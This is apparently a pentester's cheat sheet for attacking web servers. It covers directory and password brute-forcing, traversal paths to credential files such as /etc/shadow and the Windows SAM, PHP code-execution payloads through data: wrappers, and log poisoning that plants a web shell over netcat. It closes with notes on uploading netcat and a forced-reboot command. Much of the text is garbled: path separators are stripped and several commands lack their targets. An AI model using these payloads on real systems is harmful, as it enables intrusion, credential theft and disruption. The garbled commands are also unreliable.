Web Server Enumeration

PORT 443

…web server ports are not limited to these, look for open http services
…multiple attack vectors

dirb dirb -P -o file.txt # USED TO SCAN OTHER PORTS dirbuster. # GUI USED TO ENUMERATE gobuster dir -u -w wordlist.txt # TAKES A WHILE (220K words) /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt # QUICKER (87K words) /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt # QUICKETS (5K words) /usr/share/wordlists/dirb/common.txt medusa -h -u admin -P rockyou.txt -M http -m DIR:/admin DIRECTORY TRAVERSAL REMOTE FILE INCLUSION LOCAL FILE INCLUSION SQL INJECTION # WordPress Enumeration if found wpscan --url --passwords /usr/share/wordlists/rockyou.txt --usernames admin [!] Valid Combinations Found: | Username: admin, Password: password


…you may be able to view files on the server
…you’ll traverse file paths using “../../../” to go backward
…then list the location of the file you are trying to read


…you can look for very common files on a system

WINDOWS C:windowswin.ini C:windowssystem.ini C:windowsiis.log C:windowsSystem32Driversetchosts C:Windowssystem32configSYSTEM C:windowsdebugnetsetup.log C:windowsdebugsammui.log C:windowsdebugnetlogon.log C:windowsdebugpasswd.log C:windowssystem32winevtlogssystem.evtx C:windowssystem32winevtlogsWindows Powershell.evtx C:windowsWindowsUpdate.log C:windowssystem32calc.exe C:windowssystem32windowspowershellv1.0powershell.exe C:windowsccmlogsfilesystemfile.log C:usersadministratorappdatalocalrecently-used.xbel C:usersadministratordesktopdesktop.ini C:windowspantherunattended.xml C:windowspantherunattendedunattended.xml C:windowsrepairsam C:windowssystem32tasksdaily C:windowspanthersysprep.inf LINUX /etc/passwd /etc/shadow /etc/crontab


… you may be able to reference a file on your own server via the web request
… look for a page or file request (?page=)
… URL encoding may be done through BurpSuite Decoder # EXAMPLE USING ACS WITH ESCAPE PADDING AT THE END # EMAPLE USING CURL curl -s --data "<?system('$CMD');?>" ''


… if you can poison a file on their server, you may be able to use it
… sometimes this works after discovering Directory Traversal
… URL encoding may be done through BurpSuite Decoder

# DIRECTORY TRAVERSAL WORKED ?file=../../../../../../../var/log/httpd/access_log # SO LFI MAY BY POISONING THE LOG FILES ?file=data:text/plain,<?php echo shell_exec("dir") ?> ?helpfile=../secret/.htpasswd ?download=brochure.pdf ?download=../include/connection.php # URL ENCODE THROUGH BURPSUITE DECODER ?file=data:text/plain,%3C?php%20echo%20shell_exec(%22id%22)%20?%3E # MORE LOG POISION TECHNIQUES # COMMON PADDING param=../../../../../../etc/passwd%00 # Default Locations RHEL / Red Hat / CentOS / Fedora Linux Apache log file location /var/log/httpd/access_log /var/log/httpd/error_log Debian / Ubuntu Linux Apache log file location /var/log/apache2/access.log /var/log/apache2/error.log FreeBSD Apache log file location /var/log/httpd-access.log /var/log/httpd-error.log # For custom log locations, find the "CustomLog" and "ErrorLog" definitions within these files: /usr/local/etc/apache2/httpd.conf /etc/apache2/apache2.conf /etc/httpd/conf/httpd.conf # Windows web roots C:/xampp/htdocs/ C:/wamp/www/ C:/Inetpub/wwwroot/ # CONNECT AND POISON $ nc 80 <?php echo shell_exec($_GET['cmd']);?> # USE LANG ATTRIBUTE TO ACCESS LOG # UPLOAD NETCAT WITH TFTP # EXECUTE NETCAT


shutdown /r /t 0

Scroll to top